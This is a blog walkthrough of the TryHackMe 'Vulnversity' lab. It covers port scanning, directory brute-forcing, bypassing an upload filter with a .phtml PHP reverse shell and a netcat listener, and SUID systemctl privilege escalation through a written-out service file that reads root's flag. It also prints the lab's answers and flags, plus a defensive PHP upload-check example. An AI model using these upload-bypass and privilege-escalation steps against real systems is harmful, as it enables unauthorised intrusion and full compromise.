Vulnversity — Walkthrough Tryhackme
Santosh Kumar
Cyber Security Enthusiast || CEHv12 || CTF Player || Security Researcher || TryHackMe Top 1% || Programming C, Python || Bug Bounty ||
Introduction
"Vulnversity" is an introductory level room on TryHackMe that covers various penetration testing methodologies and tools. It includes tasks such as scanning, enumeration, exploitation, and post-exploitation techniques.
Task 1: Deploy the Machine
Task 2: Reconnaissance
rustscan -a 10.10.111.210 -- -A
We can see that ports 21, 22, 139, 445, 3128 and 3333 are open.
It is clearly visible that the OS is Ubuntu, on which the web server (port 3333) is running.
Scan the box, how many ports are open?
Ans. 6
What version of the squid proxy is running on the machine?
Ans. 3.5.12
What is the most likely operating system this machine is running?
Ans. Ubuntu
What port is the web server running on?
Ans. 3333
It's essential to ensure you are always doing your reconnaissance thoroughly before progressing. Knowing all open services (each of which can be a point of exploitation) is very important. Don't forget that ports in a higher range might be open, so always scan ports above 1000 as well (even if you leave that check running in the background).
Ans. No answer needed
What is the flag for enabling verbose mode using Nmap?
Ans. -v
Task 3: Locating directories using Gobuster
Objective: Use GoBuster to find hidden directories.
Gobuster is a popular tool used in penetration testing for brute-forcing directories and files on web servers, as well as DNS subdomains. It's written in Go, which makes it fast and efficient. Here's a breakdown of its main features and uses:
gobuster dir -u https://10.10.111.210:3333 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
We find an /internal directory, and further enumeration leads to the /internal/uploads directory.
What is the directory that has an upload form page?
Ans. /internal/
Task 4: Compromise the webserver
We try to upload a PHP reverse shell script, but the extension is being filtered.
We start Burp Suite and enable it in FoxyProxy. Then, create a file with different PHP extensions for the Sniper attack.
We capture the upload request and then send it to Intruder.
We load our payload as a simple list.
We start our attack and receive the results. Interestingly, every extension returns a Status 200, but the response length for the .phtml extension is different from the others.
I uploaded a PHP reverse shell from pentestmonkey and navigated to “/internal/uploads/rev-shell.phtml”, and also set up a netcat listener on port 8888/tcp. Then change the extension to .phtml.
We start a netcat listener, then upload the shell and navigate to https://10.10.111.210:3333/internal/uploads/php-reverse-shell.phtml. This will execute the payload.
nc -lvnp 8888
What common file type you'd want to upload to exploit the server is blocked? Try a couple to find out.
Ans. .php
I understand the Burpsuite tool and its purpose during pentesting.
Ans. No answer needed
What extension is allowed after running the above exercise?
Ans. .phtml
While completing the above exercise, I have successfully downloaded the PHP reverse shell.
Ans. No answer needed
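The upload filter bypassed above is a block-list check: .php is rejected, but .phtml, which Apache's PHP handler also executes, is not on the list. The following is an added example (not code from the Vulnversity room) showing that style of check beside an allow-list version that also inspects file content; the function names and the image-only policy are assumptions.

```php
<?php
// Weak: a block-list of "known bad" extensions. Anything not listed, such as
// .phtml, .phar or .phps, is accepted, which is exactly the gap the Intruder
// run in this walkthrough found.
function weak_extension_check(string $filename): bool {
    $blocked = ['php', 'php3', 'php4', 'php5'];
    $ext = strtolower(pathinfo($filename, PATHINFO_EXTENSION));
    return !in_array($ext, $blocked, true);   // true = upload accepted
}

// Hardened: allow-list of expected types, exactly one dot in the name (so
// shell.php.jpg cannot reach Apache's multi-extension handling), and the
// content's magic bytes must match the claimed type. Returns the server-chosen
// filename to store under, or null to reject. $tmpPath is the uploaded temp file.
function strict_upload_check(string $filename, string $tmpPath): ?string {
    $allowed = ['jpg' => 'image/jpeg', 'png' => 'image/png', 'gif' => 'image/gif'];
    if (substr_count($filename, '.') !== 1) {
        return null;
    }
    $ext = strtolower(pathinfo($filename, PATHINFO_EXTENSION));
    if (!isset($allowed[$ext])) {
        return null;
    }
    // Check what the bytes are, not what the name says.
    $mime = (new finfo(FILEINFO_MIME_TYPE))->file($tmpPath);
    if ($mime !== $allowed[$ext]) {
        return null;
    }
    // Client never chooses the stored name or path; the uploads directory
    // should additionally be served with script execution disabled.
    return bin2hex(random_bytes(16)) . '.' . $ext;
}

// Constructed sample names illustrating the difference (no real uploads).
var_dump(weak_extension_check('rev-shell.php'));    // bool(false)
var_dump(weak_extension_check('rev-shell.phtml'));  // bool(true)  <- bypass
var_dump(strict_upload_check('rev-shell.phtml', '/tmp/x') === null); // bool(true)
```

The allow-list rejects .phtml before the file is even opened, and an uploads directory that does not execute scripts removes the impact even if a name slips through.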
What is the name of the user who manages the webserver?
Ans. bill
python -c 'import pty; pty.spawn("/bin/bash")'
What is the user flag?
Ans. 8bd7992fbe8a6ad22a63361004cfcedb
Task 5: Privilege Escalation
With the reverse shell in place, you need to escalate your privileges to gain full control of the machine. Check for any sudo privileges or SUID binaries that might be exploitable:
find / -perm -u=s -type f 2>/dev/null
We see that /bin/systemctl is a SUID binary, which we can use to gain privileged access. Let's check GTFOBins and search for systemctl.
Reference: https://gtfobins.github.io/gtfobins/systemctl/
We create a temporary service and then use it to read the root.txt file.
TF=$(mktemp).service
echo '[Service]
ExecStart=/bin/sh -c "cat /root/root.txt > /tmp/output"
[Install]
WantedBy=multi-user.target' >$TF
/bin/systemctl link $TF
/bin/systemctl enable --now $TF
cd /tmp
cat output
On the system, search for all SUID files. Which file stands out?
Ans. /bin/systemctl
What is the root flag value?
Ans. a58ff8579f0a9270368d33a9966c7fd5